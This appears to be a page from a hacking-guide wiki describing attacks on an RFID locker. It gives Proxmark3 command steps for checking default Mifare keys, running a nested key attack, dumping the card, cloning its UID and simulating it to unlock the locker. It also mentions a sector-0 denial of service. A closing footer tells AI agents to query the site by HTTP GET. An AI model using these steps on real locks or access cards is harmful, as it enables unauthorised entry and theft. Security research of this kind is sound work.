# Locker RFID

{% hint style="info" %}
[More information about RFID on the dedicated "Technology" page.](/hacking-guide/technology-1/researched-technologies/untitled.md)
{% endhint %}

### Attack scenario's  <a href="#docs-internal-guid-3ff257f3-7fff-da25-d793-8eaf5bb546b7" id="docs-internal-guid-3ff257f3-7fff-da25-d793-8eaf5bb546b7"></a>

* Bruteforce RFID UID&#x20;
* Card cloning
* Card read and simulation&#x20;
* Card write sector 0 (dos)

### Real life scenario's  <a href="#docs-internal-guid-6a79a191-7fff-0996-04ca-bf7b26f938f4" id="docs-internal-guid-6a79a191-7fff-0996-04ca-bf7b26f938f4"></a>

Card skimming by placing a reader next or on top of the existing reader. To execute a **card cloning or card simulation attack.**

A **Bruteforce attack** by trying multiple UID'S on a specific locker. This is not ideal because you will have to press a button each time before you can unlock it, this is not very realistic.&#x20;

A **Dos attack** by rewriting sector 0 on users RFID cards. Only possible with writeable cards.

### Steps

Steps for a card cloning/simulation attack.

1. Use card 1 to lock the locker.
2. Scan card 1 with a rfid reader to get the UID.
3. Write UID of card 1 to card 2.
4. Use card 2 to open the locker or simulate the UID of card 1 to open the locker by using the proxmark3.

#### Proxmark easy Steps

Steps for  a card cloning/Simulate attack using a proxmark.

1. Use card 1 to lock the locker.
2. Scan card 1 with proxmark  using the command **hf search** to get the UID and type of card.

   ![](/files/-Lv5sELXuYlMi_lHAGRe)
3. Check default keys of Mifare classic card using the command **hf mf chk \*1 ?** (Go to step 9 for Simulate UID).                     &#x20;

   &#x20;<img src="/files/-Lv5tFZkX5DSJ7Wj7S5W" alt="" data-size="original">                      &#x20;
4. Dumping keys for each sector to dumpkeys.bin using command **hf mf nested 1 0 A ffffffffffff d** <img src="/files/-Lv5ugg5TUwLj7dcjIDi" alt="" data-size="original">
5. Create dump file with the command **hf mf dump**&#x20;

   &#x20;<img src="/files/-Lv5vqBmEiONO3gK-to8" alt="" data-size="original">
6. Get card 2 change UID with the command **hf mf csetuid 795f17ad**<img src="/files/-Lv5wMQyV0f7sbL1mrF6" alt="" data-size="original">
7. Use card 2 to open locker.

   <img src="/files/-Lv5w_sLcs485bertY9k" alt="" data-size="original">
8. Simulate card 1 using the command **hf 14a sim t 1 u 795f17ad** <img src="/files/-Lv5wv9KHk6_NTKBng4E" alt="" data-size="original">
9. Use the proxmark to open locker

### DEMO

{% embed url="<https://drive.google.com/file/d/1ARkWg0eN_rc2suxeIY9FSc--V38q1PVN/view>" %}

#### Tools used

* Proxmark is handy for reading/writing data and to simulate RFID tags
  * Software and firmware used from the [ proxmark3 GitHub](https://github.com/Proxmark/proxmark3)
* RFID card 1 M1 S50 13,56 MHZ
* RFID card 2 UID 13,56 MHZ (clone card)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://fonty-s.gitbook.io/hacking-guide/devices-1/locker-rfid.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.